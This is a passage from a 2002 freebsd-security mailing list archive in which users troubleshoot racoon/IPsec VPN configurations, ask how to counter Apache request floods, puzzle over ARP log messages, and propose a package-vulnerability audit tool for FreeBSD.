        # These value can be changed per remote node.
        counter 5;              # maximum trying count to send.
        interval 20 sec;        # maximum interval to resend.
        persend 1;              # the number of packets per a send.

        # timer for waiting to complete each phase.
        phase1 30 sec;
        phase2 15 sec;
}

remote anonymous {
        exchange_mode main,aggressive;
        nonce_size 16;
        lifetime time 10 min;   # sec,min,hour
        initial_contact on;
        support_mip6 on;
        proposal_check obey;    # obey, strict or claim

        proposal {
                encryption_algorithm 3des;
                hash_algorithm md5;
                authentication_method pre_shared_key;
                dh_group 2;
        }
}

sainfo anonymous {
        pfs_group 1;
        lifetime time 36000 sec;
        encryption_algorithm 3des;
        authentication_algorithm hmac_md5,hmac_sha1;
        compression_algorithm deflate;
}

Any ideas, insight? This is driving me insane! :(

Matthew

>>> Dru 07/27/02 07:36 AM >>>
Have you tried a "tcpdump port 500" during Phase 1 negotiations? This will show the proposal exchange so you can see which parts aren't matching up. If that doesn't do it, send that output along with your racoon.conf file.

Dru

From owner-freebsd-security Mon Jul 29 11: 4: 2 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8BB4F37B400 for ; Mon, 29 Jul 2002 11:03:59 -0700 (PDT)
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C014143E5E for ; Mon, 29 Jul 2002 11:03:58 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org)
Received: from freefall.freebsd.org (peter@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6TI3wJU022683 for ; Mon, 29 Jul 2002 11:03:58 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org)
Received: (from peter@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6TI3vGR022678 for security@freebsd.org; Mon, 29 Jul 2002 11:03:57 -0700 (PDT)
Date: Mon, 29 Jul 2002 11:03:57 -0700 (PDT)
Message-Id:
<200207291803.g6TI3vGR022678@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports No matches to your query To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 11:10:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E1CD837B400 for ; Mon, 29 Jul 2002 11:10:25 -0700 (PDT) Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3F76C43E4A for ; Mon, 29 Jul 2002 11:10:25 -0700 (PDT) (envelope-from cfaber@fpsn.net) Received: from fpsn.net (unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g6TIAKp10330; Mon, 29 Jul 2002 12:10:20 -0600 (MDT) Message-ID: <3D4584DA.190EEB9C@fpsn.net> Date: Mon, 29 Jul 2002 12:09:30 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Cyrus Cc: security@FreeBSD.ORG Subject: Re: counter apache DoS attacks? 
References: <20020729050402.Q47608-100000@odsource.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

ipfw add deny tcp from to any 80

;-)

Cyrus wrote:
>
> Several people get their jollies off by having different servers
> infinitely request my main page thousands of times each therefore shooting
> my memory to poo and a lot of bandwidth. But my problem is the memory, not
> the bandwidth. I've looked through mod_throttle and such, not for me. Is
> there anything out there that can automatically detect and take an action
> for this type of attack? I dunno...like use route on the offenders IP and
> such. But for it to do this automatically. Anyone have any suggestions?
> Thanks in advance.
>
> -Cyrus
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

--
Colin Faber
(303) 736-5160
fpsn.net, Inc.

* Black holes are where God divided by zero. *

From owner-freebsd-security Mon Jul 29 11:30:17 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F09DA37B400 for ; Mon, 29 Jul 2002 11:30:13 -0700 (PDT)
Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5B3D543E70 for ; Mon, 29 Jul 2002 11:30:13 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA24709; Mon, 29 Jul 2002 12:29:56 -0600 (MDT)
X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms.
Message-Id: <4.3.2.7.2.20020729122752.00bbcbd0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Mon, 29 Jul 2002 12:29:52 -0600
To: Cyrus , security@FreeBSD.ORG
From: Brett Glass
Subject: Re: counter apache DoS attacks?
In-Reply-To: <20020729050402.Q47608-100000@odsource.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

See my presentation from OSCon:

http://www.brettglass.com/apacheabuse/

--Brett

P.S. -- The material overlaps somewhat with my recent BSDCon presentation, but this talk specifically focused on Apache and how to avoid abuses ranging from address harvesting to worms.

At 03:04 AM 7/29/2002, Cyrus wrote:
>Several people get their jollies off by having different servers
>infinitely request my main page thousands of times each therefore shooting
>my memory to poo and a lot of bandwidth. But my problem is the memory, not
>the bandwidth. I've looked through mod_throttle and such, not for me. Is
>there anything out there that can automatically detect and take an action
>for this type of attack? I dunno...like use route on the offenders IP and
>such. But for it to do this automatically. Anyone have any suggestions?
>Thanks in advance.
> >-Cyrus
> >
> >To Unsubscribe: send mail to majordomo@FreeBSD.org
> >with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jul 29 12:53:40 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DFECA37B407; Mon, 29 Jul 2002 12:53:15 -0700 (PDT)
Received: from mail.seton.org (ftp.seton.org [207.193.126.172]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5249643EE5; Mon, 29 Jul 2002 12:51:39 -0700 (PDT) (envelope-from mgrooms@seton.org)
Received: from aus-gwia.aus.dcnhs.org (aus-gwia.aus.dcnhs.org [10.20.10.211]) by mail.seton.org (Postfix) with ESMTP id D987CD0077; Mon, 29 Jul 2002 14:49:38 -0500 (CDT)
Received: from AUS_SETON-MTA by aus-gwia.aus.dcnhs.org with Novell_GroupWise; Mon, 29 Jul 2002 14:49:38 -0500
Message-Id:
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Mon, 29 Jul 2002 14:49:22 -0500
From: "Matthew Grooms"
To: , ,
Subject: Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ...
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Ok, I'm a moron. I was trying to use the gif driver when I shouldn't have. As soon as I changed the setkey parameters to a non-tunnel device config it started negotiating.

ie ..

# delete all existing SPD and SAD entries
setkey -FP
setkey -F
setkey -c << EOF
spdadd 10.22.200.0/24 10.20.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require;
spdadd 10.22.200.0/24 10.21.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require;
spdadd 10.22.200.0/24 10.23.0.0/16 any -P out ipsec esp/tunnel/66.90.146.202-65.118.63.252/require;
spdadd 10.20.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require;
spdadd 10.21.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require;
spdadd 10.23.0.0/16 10.22.200.0/24 any -P in ipsec esp/tunnel/65.118.63.252-66.90.146.202/require;
EOF

When the connection is initiated from the bsd side, traffic passes through the vpn1 box, unencrypted and routed to the remote host without a problem. Unfortunately, the response from the remote host gets caught up on the return trip. I am guessing this is because the bsd and vpn1 box agree on an outbound (from the bsd box's perspective) proposal but cannot agree on an inbound proposal. The checkpoint error logs say 'encryption failure : no response from peer'. However, here is some tcpdump output that shows bi-directional communications. I'm not sure how to interpret this. Any ideas anyone?
tcpdump: listening on eth0
14:36:16.766265 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: [|sa] (DF)
14:36:17.266091 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 1 R agg: [|sa]
14:36:17.284486 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF)
14:36:17.387671 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF)
14:36:17.487667 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 1 I agg: (hash: len=16) (DF)
14:36:17.816164 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:18.387787 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:19.817694 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:19.989945 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:21.817694 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:21.939733 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:23.817694 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:23.902725 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:25.817695 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:25.887740 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:27.817694 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:27.893544 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:29.817750 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:29.904151 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:33.817767 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:33.891523 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:37.817766 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:37.897711 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:41.817772 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:41.894646 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:45.817771 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:45.891121 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]
14:36:49.817775 65.118.63.252.isakmp > 66.90.146.202.isakmp: isakmp: phase 2/others I oakley-quick[E]: [|hash] (DF)
14:36:49.883577 66.90.146.202.isakmp > 65.118.63.252.isakmp: isakmp: phase 2/others R inf[E]: [|hash]

-Matthew

From owner-freebsd-security Mon Jul 29 16:36:52 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DE9C237B400 for ; Mon, 29 Jul 2002 16:36:46 -0700 (PDT)
Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id BF44943E4A for ; Mon, 29 Jul 2002 16:36:45 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca)
Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g6TNb2u32377; Mon, 29 Jul 2002 17:37:02 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca)
From: "Duncan Patton a Campbell is Dhu"
To: Trish Lynch ,
Subject: Re: racoon and weirdness....
Date: Mon, 29 Jul 2002 17:37:02 -0600
Message-Id: <20020729233702.M411@babayaga.neotext.ca>
In-Reply-To: <20020729103029.R484-100000@trish.dyn.magenet.com>
References: <20020729103029.R484-100000@trish.dyn.magenet.com>
X-Mailer: Open WebMail 1.70 20020712
X-OriginatingIP: 127.0.0.1 (campbell)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

I was never able to get racoon to actually re-establish: that is, if one of my machines went down, all the racoon daemons needed to be restarted. As a first-order observation of what others have been saying, racoon has or exposes problems if all the communicant boxes are not the same. So for now I'm running a manual ipsec config.

Dhu

Duncan Patton a Campbell is Duibh ;-)

---------- Original Message -----------
From: Trish Lynch
To:
Sent: Mon, 29 Jul 2002 10:46:30 -0400 (EDT)
Subject: racoon and weirdness....

> I'm working on setting up IPSEC tunnels between a KAME/racoon/FreeBSD-STABLE box and a Ravlin unit at a client's
>
> What is happening with the one tunnel is this:
>
> after a couple days, it times out, and neither side can reestablish traffic between, the log in /var/log/daemon for racoon tells me the tunnel *is* established, but I can't ping through it. If I restart racoon, it all starts working fine again.
>
> The second issue is a second machine, with a cut/pasted config into racoon.conf, with simply the endpoints changed, does not work at all.
>
> I can ping the external interface of the Ravlin, but it doesn't even *begin* phase 1.
>
> Here is the racoon.conf:
>
> remote ravlin-ext-ip [500]
> {
>     exchange_mode main,aggressive;
>     my_identifier address my-ext-ip;
>     peers_identifier address ravlin-ext-ip;
>     generate_policy on;
>     nonce_size 16;
>     lifetime time 3 hour; # sec,min,hour
>
>     proposal {
>         encryption_algorithm 3des;
>         hash_algorithm md5;
>         authentication_method pre_shared_key ;
>         dh_group 1 ;
>     }
> }
>
> remote ravlin-int-ip [500]
> {
>     exchange_mode main,aggressive;
>     my_identifier address my-int-ip;
>     peers_identifier address ravlin-int-ip;
>     generate_policy on;
>     nonce_size 16;
>     lifetime time 3 hour; # sec,min,hour
>
>     proposal {
>         encryption_algorithm 3des;
>         hash_algorithm sha1;
>         authentication_method pre_shared_key ;
>         dh_group 2 ;
>     }
> }
>
> sainfo address my-ext-ip/32[0] any address ravlin-ext-ip/32[0] any {
>     # pfs_group 2;
>     lifetime time 10800 sec;
>     encryption_algorithm 3des ;
>     authentication_algorithm hmac_md5,hmac_sha1;
>     compression_algorithm deflate ;
> }
>
> sainfo address my-int-net/23[0] any address ravlin-int-net/24[0] any {
>     # pfs_group 2;
>     lifetime time 10800 sec;
>     encryption_algorithm 3des ;
>     authentication_algorithm hmac_md5,hmac_sha1;
>     compression_algorithm deflate ;
> }
>
> the gif interface is set up as such:
>
> BSD2 == my machine  BSD5 == Ravlin
>
> $IFCONFIG $GIF3 plumb
> $IFCONFIG $GIF3 mtu 1500
> $IFCONFIG $GIF3 inet $BSD2_IP $BSD5_IP netmask $NETMASK
> /usr/sbin/setkey -FP
> /usr/sbin/setkey -F
> /usr/sbin/setkey -c << EOF
> spdadd $BSD2_PUB_NET $BSD5_PUB_NET any -P out ipsec esp/tunnel/${BSD2_PUB_IP}-${BSD5_PUB_IP}/require;
> spdadd $BSD5_PUB_NET $BSD2_PUB_NET any -P in ipsec esp/tunnel/${BSD5_PUB_IP}-${BSD2_PUB_IP}/require;
> EOF
>
> Anyone wanna hit me with a cluebat?
> > -Trish > > -- > Trish Lynch trish@egobsd.org > Ecartis Core Team > Key fingerprint = B04E 67CA 3A12 9930 E91C 7730 4606 > 3618 B74A 2493 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the > message ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 16:53:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D44F937B400 for ; Mon, 29 Jul 2002 16:53:36 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6A21643E5E for ; Mon, 29 Jul 2002 16:53:35 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g6TNrCu32408; Mon, 29 Jul 2002 17:53:16 -0600 (MDT) (envelope-from campbell@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: "Craig Miller" , "Duncan Patton a Campbell is Dhu" , "faSty" Cc: Subject: Re: wierdness in my security report Date: Mon, 29 Jul 2002 17:53:12 -0600 Message-Id: <20020729235312.M27786@babayaga.neotext.ca> In-Reply-To: <002001c23674$adb8a260$fe01a8c0@Desktop> References: <006301c22e83$2b3d5b30$fe01a8c0@Desktop> <20020718204203.GA71330@i-sphere.com> <20020718204840.M67510@babayaga.neotext.ca> <002001c23674$adb8a260$fe01a8c0@Desktop> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (campbell) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hmm. 
I saw this shit when I was running a telus adsl link, and the logs for it are long gone. If you can give a better description of your layout it might kick over some of my neurons... I think you are running something like: ATT BSDGATE InternalBox InternalBox . . etc the .1 address is the ATT default router Duncan Patton a Campbell is Duibh ;-) ---------- Original Message ----------- From: "Craig Miller" To: "Duncan Patton a Campbell is Dhu" , "faSty" Sent: Sun, 28 Jul 2002 13:23:47 -0700 Subject: Re: wierdness in my security report > That is correct, they are not my MAC addresses. Also, > based on the mac address it is Cisco hardware further > pointing toward AT&Ts hardware since my FreeBSD box > definately is not made by Cisco. > > --Craig > > ----- Original Message ----- > From: "Duncan Patton a Campbell is Dhu" > To: "faSty" ; "Craig Miller" > Cc: > Sent: Thursday, July 18, 2002 1:48 PM > Subject: Re: wierdness in my security report > > > This I've seen too, but he sez the mac's aren't his.... > > > > Duncan Patton a Campbell is Duibh ;-) > > > > ---------- Original Message ----------- > > From: faSty > > To: Craig Miller > > Sent: Thu, 18 Jul 2002 13:42:03 -0700 > > Subject: Re: wierdness in my security report > > > > > DO you have bridge on your server? > > > > > > I have that same similar and the bridge 2 ethernet > > > port fight over who master the primary IP address. > > > > > > -fasty > > > > > > On Thu, Jul 18, 2002 at 10:47:21AM -0700, Craig Miller > > > wrote: > > > > Anyone have any ideas as to what might be causing the > > following to appear in my security report? 
> > > > > > > > arp: 12.236.220.1 moved from 00:b0:64:b7:6f:54 to > > 00:b0:64:b7:6f:a8 on dc0 > > > > > Jul 17 05:47:56 server /kernel: arp: 12.236.220.1 moved > > from 00:b0:64:b7:6f:54 to 00:b0:64:b7:6f:a8 on dc0 > > > > > arp: 12.236.220.1 moved from 00:b0:64:b7:6f:a8 to > > 00:b0:64:b7:6f:54 on dc0 > > > > > Jul 17 05:47:57 server /kernel: arp: 12.236.220.1 moved > > from 00:b0:64:b7:6f:a8 to 00:b0:64:b7:6f:54 on dc0 > > > > > > > > I thought those : delimited fields would be MAC addresses, > > but they don't match the MAC addresses of either of the two > > cards in my free-bsd box. I have not checked the MAC addresses > > of the other network cards on my network. > > > > > > > > Also, where does the "server /kernel" name come from. > > "kernel" is not the name I gave my kernel, so I am suspicious. > > > > > > > > Thanks, > > > > > > > > --Craig > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the > > > message > > ------- End of Original Message ------- > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message ------- End of Original Message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 16:59:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BA3E937B400 for ; Mon, 29 Jul 2002 16:59:23 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id B4AFF43E70 for ; Mon, 29 Jul 2002 16:59:22 -0700 (PDT) (envelope-from campbell@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.11.6/8.11.0) with ESMTP id g6TNxGu32430; Mon, 29 Jul 2002 17:59:16 -0600 
(MDT) (envelope-from campbell@babayaga.neotext.ca)
From: "Duncan Patton a Campbell is Dhu"
To: Colin Faber , Cyrus
Cc: security@FreeBSD.ORG
Subject: Re: counter apache DoS attacks?
Date: Mon, 29 Jul 2002 17:59:16 -0600
Message-Id: <20020729235916.M5438@babayaga.neotext.ca>
In-Reply-To: <3D4584DA.190EEB9C@fpsn.net>
References: <20020729050402.Q47608-100000@odsource.com> <3D4584DA.190EEB9C@fpsn.net>
X-Mailer: Open WebMail 1.70 20020712
X-OriginatingIP: 127.0.0.1 (campbell)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Whether this works depends on some things. Is it always the same boxes doing the requests? Same set of boxes?

Also, if memory is the problem, not band, there is some kind of apache setting that causes the daemons to suicide and respawn after a number of connections, which frees up any memory leaked by the process. It may be you have apache set up to not do this (which is possible to do).

Duncan Patton a Campbell is Duibh ;-)

---------- Original Message -----------
From: Colin Faber
To: Cyrus
Sent: Mon, 29 Jul 2002 12:09:30 -0600
Subject: Re: counter apache DoS attacks?

> ipfw add deny tcp from to any 80
>
> ;-)
>
> Cyrus wrote:
> >
> > Several people get their jollies off by having different servers
> > infinitely request my main page thousands of times each therefore shooting
> > my memory to poo and a lot of bandwidth. But my problem is the memory, not
> > the bandwidth. I've looked through mod_throttle and such, not for me. Is
> > there anything out there that can automatically detect and take an action
> > for this type of attack? I dunno...like use route on the offenders IP and
> > such. But for it to do this automatically. Anyone have any suggestions?
> > Thanks in advance.
> >
> > -Cyrus
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
>
> --
> Colin Faber
> (303) 736-5160
> fpsn.net, Inc.
>
> * Black holes are where God divided by zero. *
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the
> message
------- End of Original Message -------

From owner-freebsd-security Mon Jul 29 17: 6:26 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C349237B400 for ; Mon, 29 Jul 2002 17:06:24 -0700 (PDT)
Received: from phobos.raisdorf.net (phobos.raisdorf.net [195.244.235.251]) by mx1.FreeBSD.org (Postfix) with ESMTP id CFDBD43E4A for ; Mon, 29 Jul 2002 17:06:22 -0700 (PDT) (envelope-from hscholz@raisdorf.net)
Received: (from netadmin@localhost) by phobos.raisdorf.net (8.11.6/8.11.6) with UUCP id g6TNb7u04131 for freebsd-security@freebsd.org; Tue, 30 Jul 2002 01:37:07 +0200 (CEST)
X-Authentication-Warning: phobos.raisdorf.net: netadmin set sender to hscholz@raisdorf.net using -f
Received: from deimos.raisdorf.net (deimos.raisdorf.net [127.0.0.1]) by deimos.raisdorf.net (Postfix) with SMTP id 84D0067B06 for ; Tue, 30 Jul 2002 10:05:34 +1000 (EST)
Date: Tue, 30 Jul 2002 10:05:34 +1000
From: Hendrik Scholz
To: freebsd-security@freebsd.org
Subject: audit-packages like program for FreeBSD?
Organization: no
X-Mailer: Sylpheed version 0.7.8claws (GTK+ 1.2.10; i386-portbld-freebsd5.0)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <20020730000534.84D0067B06@deimos.raisdorf.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hi!

While using NetBSD I discovered the audit-packages package. Basically it consists of a script and a text file. The text file contains information about packages/ports that are vulnerable to any kind of remote/local/dos attack. The script can be run by the daily cron job and then checks if one of the installed packages is mentioned in the list of vulnerable packages. If so it reports package name, version, type of bug and a URL to an advisory as part of the cron report. The text file can be updated with ftp/wget/...

As I've been thinking about this I just want to know if someone is interested in this for FreeBSD?

Writing the script itself should be no problem for me but maintaining the vulnerability database could become difficult as the number of ports grows. A script that crawls through the ports cvs tree and checks for ports marked forbidden since the last run would be a good start but for unmaintained ports bugtraq/vuln-watch/... has to be read. Any ideas how to get more input?

Which language to use? Perl would do fine for this job but as Perl isn't in the base system anymore a shell script or c program would be better if it should be possible to run this as part of the daily cron job. If I start with this, what language should I use?

Thanks for all comments, Hendrik

P.S.
I won't be able to answer all questions immediately as I'm on vacation :)

--
Hendrik Scholz - - http://raisdorf.net/

drag me, drop me - treat me like an object

From owner-freebsd-security Mon Jul 29 18:20:25 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 207F737B400 for ; Mon, 29 Jul 2002 18:20:21 -0700 (PDT)
Received: from mail.drkshdw.org (user205.net239.fl.sprint-hsd.net [209.26.20.205]) by mx1.FreeBSD.org (Postfix) with ESMTP id E6DBA43E67 for ; Mon, 29 Jul 2002 18:20:19 -0700 (PDT) (envelope-from scorpio@drkshdw.org)
Received: (qmail 77993 invoked by uid 85); 30 Jul 2002 01:20:58 -0000
Received: from scorpio@drkshdw.org by scorpio.DrkShdw.org by uid 82 with qmail-scanner-1.12 (uvscan: v4.1.60/v4205. spamassassin: 2.20. . Clear:. Processed in 0.743099 secs); 30 Jul 2002 01:20:58 -0000
Received: from unknown (HELO router.drkshdw.org) (192.168.134.2) by user205.net239.fl.sprint-hsd.net with SMTP; 30 Jul 2002 01:20:57 -0000
Message-Id: <5.1.1.6.0.20020729212013.00a03140@mail.drkshdw.org>
X-Sender: scorpio@mail.drkshdw.org
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Mon, 29 Jul 2002 21:21:16 -0400
To: Hendrik Scholz , freebsd-security@freebsd.org
From: Jeff Palmer
Subject: Re: audit-packages like program for FreeBSD?
In-Reply-To: <20020730000534.84D0067B06@deimos.raisdorf.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

pkg_version -c works for me.

If all your ports are updated as needed, security issues are fixed as the portstree is updated ;-)

Jeff Palmer
scorpio@drkshdw.org

At 10:05 AM 7/30/02 +1000, Hendrik Scholz wrote:
>Hi!
>
>While using NetBSD I discovered the audit-packages package.
>Basically it consists of a script and a text file.
>The text file contains information about packages/ports that are
